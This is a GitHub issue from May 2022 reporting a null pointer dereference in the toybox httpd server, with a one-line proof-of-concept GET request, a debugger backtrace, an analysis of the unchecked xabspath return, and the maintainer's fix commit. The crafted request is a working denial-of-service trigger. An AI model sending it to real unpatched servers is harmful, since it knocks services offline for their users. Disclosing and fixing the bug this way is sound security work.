Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Null pointer dereference in httpd.c #346

Closed
Taolaw opened this issue May 23, 2022 · 2 comments
Closed

Null pointer dereference in httpd.c #346

Taolaw opened this issue May 23, 2022 · 2 comments

Comments

@Taolaw
Copy link

Taolaw commented May 23, 2022

poc

GET /tar/tar.tar/.. HTTP/1.1\r\n\r\n

crash scene

pwndbg> bt
#0  strstart (a=a@entry=0x7fffffffdb58, b=b@entry=0x0) at lib/lib.c:506
#1  0x00005555555749f4 in isunder (dir=0x5555555bb7d4 ".", file=0x5555555cd535 "tar/tar.tar/..") at toys/net/httpd.c:86
#2  handle (infd=<optimized out>, outfd=1) at toys/net/httpd.c:132
#3  0x000055555556fcee in toy_exec_which (which=<optimized out>, argv=<optimized out>) at main.c:220
#4  0x000055555556fda1 in toybox_main () at main.c:246
#5  0x000055555556fcee in toy_exec_which (which=<optimized out>, argv=<optimized out>) at main.c:220
#6  0x000055555556fda1 in toybox_main () at main.c:246
#7  0x000055555556675f in main (argc=argc@entry=3, argv=argv@entry=0x7fffffffded8) at main.c:293
#8  0x00007ffff7c8cd90 in __libc_start_call_main (main=main@entry=0x555555566710 <main>, argc=argc@entry=3, argv=argv@entry=0x7fffffffded8) at ../sysdeps/nptl/libc_start_call_main.h:58
#9  0x00007ffff7c8ce40 in __libc_start_main_impl (main=0x555555566710 <main>, argc=3, argv=0x7fffffffded8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdec8) at ../csu/libc-start.c:392
#10 0x0000555555566795 in _start ()

Anaylize

It seems that he did not deal with the situation that the return value of xabspath was NULL, which led to the subsequent dereferencing of this NULL, and continued to trace the location of the xwrap.c:599 line. When the judgment here is true, it will be Return NULL. I think this error is a code path that may not be considered. But appearing in the httpd remote service may cause a remote denial of service.

discoverer

Taolaw@Vlab Team of Vecentek

@landley
Copy link
Owner

landley commented May 29, 2022

Commit 6d48479

@landley
Copy link
Owner

landley commented Jun 9, 2022

I'm assuming in the absence of a reply that commit fixed it for you.

@landley landley closed this as completed Jun 9, 2022
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants